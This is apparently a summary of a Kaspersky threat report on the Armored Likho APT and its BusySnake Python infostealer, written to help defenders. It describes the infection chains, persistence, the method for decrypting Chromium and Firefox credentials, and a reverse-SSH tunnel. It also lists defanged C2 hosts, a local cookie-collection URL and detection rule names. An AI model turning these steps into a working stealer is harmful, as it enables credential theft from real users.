Confirmed victims span Russia, Kazakhstan and Brazil — and the attackers are deliberately striking government agencies and the electric power sector.
How Armored Likho gains initial access
The group Kaspersky researchers call Armored Likho relies primarily on spear-phishing. In recent campaigns the attackers distributed archive attachments with social-themed names such as 1bfb2e79-8084-429e-a35c-8b595ab9f839_psihologicheskiy_test.zip (a “psychological test”) and zayavka_gumanitarnayapomosch.rar (a “humanitarian aid application”). Archives contained either an EXE dropper or a malicious LNK shortcut.
The EXE variant is a self-extracting NSIS dropper (for example psihologicheskiy_test.exe). On execution it drops a legitimate-looking pnx.exe to %TEMP% and injects code into that process to run a malicious loader. The loader fetches archives from GitHub and stages components under %APPDATA%\\WindowsHelper, including a Python 3.12 interpreter, get-pip.py, runtime components and the primary payload module.pyw. Persistence is established by creating VBScript files (wh_selfdelete.vbs to remove the initial loader and run.vbs to start module.pyw) and registering a scheduled task that runs the stealer every five minutes.
The LNK variant exploits the ZDI-CAN-25373 shortcut handling weakness to hide execution parameters. It launches an obfuscated PowerShell chain that downloads and runs the same style of loader, displays a decoy DOCX and then stages Python, pip and the BusySnake Stealer package in the same %APPDATA% directory.
BusySnake Stealer: architecture, obfuscation and behaviors
The core implant — dubbed BusySnake Stealer — is a previously undocumented, Python-based infostealer delivered as a .pyw (to avoid a console window). Its source is protected with PyArmor Pro version 9.2.0 so that bytecode is decrypted only at the moment a function is called and immediately re-encrypted. Kaspersky successfully stripped the protector and analyzed the functionality.
BusySnake organizes work into handlers (single_instance_lock, start_key_clipboard_logger, start_inventory_background, start_send_documents_priority_background, take_screenshot, poll_task and others). It enforces a single-instance lock with a lock file at Roaming\\WindowsHelper\\screenshots\\.lock and logs clipboard contents continuously to a KEYLOG_FILE. The stealer inventories files into a sqlite database at Roaming\\WindowsHelper\\inventory_state.db, skips core system directories, ignores files larger than 16 MB, and extracts 64-character hex strings using a [0-9a-fA-F]{64} regular expression.
Files under Desktop, Documents and Downloads are targeted for prioritized exfiltration if they start with “$”, are not part of “System Volume Information”, are under 5 MB and have not been previously sent. The malware polls a C2 server (example host 159.198.41[.]140) for commands and reports task status back with JSON-like POST payloads.
Credential theft, cookie exfiltration and extension-based harvesting
BusySnake implements multiple browser-theft routines. For Chromium-based browsers it locates the Login State file to obtain the encrypted master key and uses the Windows DPAPI (win32crypt.CryptUnprotectData()) to decrypt that master key. With the master key it decrypts login entries and writes chromium_passwords.json to Roaming\\WindowsHelper.
Firefox extraction follows a parallel path: the implant checks Firefox profiles for logins.json and key4.db, parses encrypted entries into SECItem structures and relies on NSS_Init and PK11SDR_Decrypt to obtain plaintext credentials (saved to firefox_passwords.json) when a master password is not present. Cookie theft uses SQL queries against Cookies or cookies.sqlite and writes all_browser_data.json for exfiltration.
Separately, the stealer can download a protected supplementary module (from GitHub Releases) that builds a browser extension (manifest.json and sw.js), hosts a local web server, installs the extension, and directs cookie data to http://127.0.0.1:8000/?data_type=c for collection and subsequent exfiltration.
Reverse SSH tunneling, C2 updates and new task framework
BusySnake includes a built-in reverse-SSH tunnel capability similar to the previously observed Go2Tunnel tool. On a start-proxy command the implant contacts a control URL such as https://grked[.]online/tunnel/create/?username=[redacted] and receives a JSON response with socks_host, socks_port, an OpenSSH private key block and an ssh_command string. The malware launches the SSH command to establish a persistent reverse tunnel and removes the key and process on a stop-proxy command.
A newer BusySnake version introduces a task-management framework: commands and Python scripts are fetched from dashboard endpoints, tasks carry unique IDs and status values (SCHEDULED, IN_PROGRESS, SUCCEEDED, FAILED), and the implant can fetch Python scripts, pip-install dependencies, and execute code fully in memory without writing files to disk.
What this means for technologists, policymakers, and affected enterprises
- Technologists and security teams: expect multilayered staging (NSIS/PowerShell → Python interpreter → PyArmor-protected payload), in-memory script execution, scheduled-task persistence and reverse-SSH tunneling; detection should include LNK launch chains and scheduled-task creation patterns.
- Policymakers and regulators: the campaign’s focus on government agencies and the electric power sector — and confirmed victims in Russia, Kazakhstan and Brazil — signals cross-border operational reach and a mix of espionage and credential harvesting that may affect critical infrastructure reporting obligations.
- Affected enterprises (government and electric power): the attackers harvest clipboard, screenshots, browser credentials, cookies, OTP secrets and Telegram session data; prioritized review of scheduled tasks, unusual SSH processes and outbound connections to domains/IPs listed in the indicators is warranted.
Kaspersky reports that its Endpoint Detection and Response Expert detects and blocks the LNK downloader and related chains using rules such as shell_creation_by_rundll32, windows_command_shell_usage and suspicious_powershell_cmd_or_script_spawning. Kaspersky also offers a Cloud Sandbox for deeper dynamic analysis and provides indicators of compromise and a reporting contact at intelreports@kaspersky.com.
Armored Likho’s BusySnake campaign combines AI-generated first-stage loaders, heavy PyArmor obfuscation, modular Python handlers and integrated reverse tunneling. The activity is ongoing, the toolkit is evolving, and defenders have concrete artifacts, IoCs and behavioral rules to act on now.
https://securelist.com/tr/armored-likho-apt-with-busysnake-stealer/120292/




